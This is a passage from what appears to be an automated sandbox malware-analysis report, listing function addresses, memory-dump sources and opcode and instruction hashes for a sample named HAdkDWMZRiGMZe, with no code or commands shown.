                                                                                            • Opcode Fuzzy Hash: 0be7e711008555287c67e3fafc2d4db2926cb144c5c2ceefd3309fa08063a7e5
                                                                                            • Instruction Fuzzy Hash: 8B1186723802057BF7209A559C47FBB375DEBC5B21F244099FB18AA2C0E6E5F81147B4
                                                                                            Function 055C851D Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 51a20866abfe1b14a0e02127222a3ada9b0eb690db3f39ecc09d3c234a670ed7
                                                                                            • Instruction ID: 8d1886d75872d6133e2cb5106f64ee6842207bd139c4055f0a8de8e6cff1a888
                                                                                            • Opcode Fuzzy Hash: 51a20866abfe1b14a0e02127222a3ada9b0eb690db3f39ecc09d3c234a670ed7
                                                                                            • Instruction Fuzzy Hash: E921E2B6D01219AF9F00DFE9D8458EEBBF9FF88210F14456AE919E7200E7705A058BA1
                                                                                            Function 055CB93D Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c2e51d759aff8d8ca54e006172727db2458450f5a244f2dff1b1918d7fa890e4
                                                                                            • Instruction ID: 597f9663b820ef3dde5098fb4a7e1592dd00bb4f042d9dc481ac0eb4b43d3f8e
                                                                                            • Opcode Fuzzy Hash: c2e51d759aff8d8ca54e006172727db2458450f5a244f2dff1b1918d7fa890e4
                                                                                            • Instruction Fuzzy Hash: D1115171600655AFDB20EBA8CC46FBF7BACFB89710F10454DF96897281E7B065058BA1
                                                                                            Function 055CC83D Relevance: .0, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 43365265a4e1a620b3fc60aa1e06ac738e347ed5450358c9ef8a53bcd6a49940
                                                                                            • Instruction ID: 6abe60b9edad87eeac14edcbfcc5472fe65966974e69eaaa11ac3522d88bfdbe
                                                                                            • Opcode Fuzzy Hash: 43365265a4e1a620b3fc60aa1e06ac738e347ed5450358c9ef8a53bcd6a49940
                                                                                            • Instruction Fuzzy Hash: D00180B2204609BBCB44DE99DC81EDB77ADAF8D754F418209BA19E7240D670E8918BA4
                                                                                            Function 055C848D Relevance: .0, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e1bc5afc42ddbb92141c2c791200da9a9ebea353ee6f590b2fa6391a5d19b11b
                                                                                            • Instruction ID: 6044df8ed07758679e0bd0d04071d9bf42294855680c10fb9550c2f0114983da
                                                                                            • Opcode Fuzzy Hash: e1bc5afc42ddbb92141c2c791200da9a9ebea353ee6f590b2fa6391a5d19b11b
                                                                                            • Instruction Fuzzy Hash: F701E9B2D01219AF8B40DFE8D8449EEBBF8BB58200F14466AE519F3200F7B15604CBE0
                                                                                            Function 055BB14D Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                            • Instruction ID: 65288cb4cd7db4b476dac094ed5ea7e6ee4265f2c341de77f0168eb0dd82a48a
                                                                                            • Opcode Fuzzy Hash: d7d27ab89eeec58d02c5abb1da15ce926c5ec2d36fb9a5dd760dc7af64820874
                                                                                            • Instruction Fuzzy Hash: F5F0827180520DEBDB14CFA4D841BDEBBB4FB04320F1083ADE8259B280D67497508781
                                                                                            Function 055CC42D Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_5350000_HAdkDWMZRiGMZe.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction ID: ec09ddf2a6900218d39cf1473dbd7ca694fdd0898f438be87fecea2aeede58b5
                                                                                            • Opcode Fuzzy Hash: 35af77d883470ba60f9356892d958fd741f5bc8cd55b1907fa4f9f8c6b65b2ac
                                                                                            • Instruction Fuzzy Hash: 40E08632240605BBD620EB59CC01F9B776CEFC9710F004419FA08AB241DA71791587B0